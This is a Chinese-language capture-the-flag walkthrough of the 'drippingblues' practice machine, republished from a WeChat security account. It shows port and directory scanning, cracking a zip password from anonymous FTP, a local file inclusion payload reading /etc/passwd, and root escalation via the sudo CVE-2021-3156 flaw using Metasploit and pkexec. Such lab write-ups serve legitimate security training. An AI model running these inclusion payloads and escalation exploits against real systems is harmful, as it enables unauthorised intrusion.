【OSCP】drippingblues

admin 2024年9月25日10:56:21评论5 views字数 3799阅读12分39秒阅读模式
【OSCP】drippingblues

OSCP 靶场

【OSCP】drippingblues

靶场介绍

drippingblues

easy

信息收集、兔子洞、ftp、zip爆破、ffuf 测试、sudo—CVE-2021–3156 提权、msf 提权

信息收集

主机发现

nmap -sn 192.168.1.0/24

【OSCP】drippingblues

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.50
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 20:17 EST
Nmap scan report for 192.168.1.50
Host is up (0.0029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
| 256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
MAC Address: 08:00:27:D1:A4:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.50  -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.50
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.50/.html (Status: 403) [Size: 277]
http://192.168.1.50/index.php (Status: 200) [Size: 138]
http://192.168.1.50/.php (Status: 403) [Size: 277]
http://192.168.1.50/robots.txt (Status: 200) [Size: 78]
http://192.168.1.50/.html (Status: 403) [Size: 277]
http://192.168.1.50/.php (Status: 403) [Size: 277]
http://192.168.1.50/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

目录扫描发现提示信息如下:

【OSCP】drippingblues

【OSCP】drippingblues

【OSCP】drippingblues

zip 爆破

匿名登录ftp ,发现存在zip 文件

【OSCP】drippingblues

下载后,对其进行密码爆破

zip2john respectmydrip.zip > hashzip
john hashzip --wordlist=/usr/share/wordlists/rockyou.txt

【OSCP】drippingblues

里面分别是respectmydrip.txt 和secret.zip ,其中secret.zip 还需要密码,但是爆破失败。

【OSCP】drippingblues

【OSCP】drippingblues

权限获取

一开始以为secret.zip 密码需要从如下这个页面去找,然后解压后就是ssh 的密码。

【OSCP】drippingblues

后面访问了该页面,不知道怎么收集所有的单词就查看了下别人的wp,才知道是假的。真正的利用点不再这里。

https://kerszl.github.io/hacking/walkthrough/drippingblues/

【OSCP】drippingblues

对index.php 进行模糊测试才知道,ftp 文本里面的那个提示的作用,原来是个参数

ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.50/index.php?FUZZ=/etc/passwd --fs=138

【OSCP】drippingblues

【OSCP】drippingblues

【OSCP】drippingblues

包含如下页面,找到了ssh 的密码

http://192.168.1.50/index.php?drip=/etc/dripispowerful.html

【OSCP】drippingblues

【OSCP】drippingblues

【OSCP】drippingblues

使用如上的密码,登录到了thugger 用户

【OSCP】drippingblues

权限提升

上传linpeas.sh 扫描,尝试使用cve-2021-3156 漏洞进行提权

https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435

【OSCP】drippingblues

sudoedit –s '123123123123'
或者
sudoedit -s /

如果响应以 sudoedit: 开头的错误,我们就可以知道该机器易受攻击,sudoedit: /: not a regular file或者segfault如果响应以 sudoedit: 开头的错误,则该机器不存在漏洞或已修补usage

【OSCP】drippingblues

【OSCP】drippingblues

这里我使用如下脚本提权失败了。应该没有编译好,要找到相同版本的系统编译才能执行成功。

https://github.com/blasty/CVE-2021-3156

直接使用msf 内置的提权模块进行提权

post/multi/recon/local_exploit_suggester
exploit/linux/local/sudo_baron_samedit

【OSCP】drippingblues

【OSCP】drippingblues

【OSCP】drippingblues

补充

同样使用pkexec 也可以直接提权到root

【OSCP】drippingblues

End

“点赞、在看与分享都是莫大的支持”

【OSCP】drippingblues

【OSCP】drippingblues

原文始发于微信公众号(贝雷帽SEC):【OSCP】drippingblues

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月25日10:56:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】drippingblueshttps://cn-sec.com/archives/3206177.html

发表评论

匿名网友 填写信息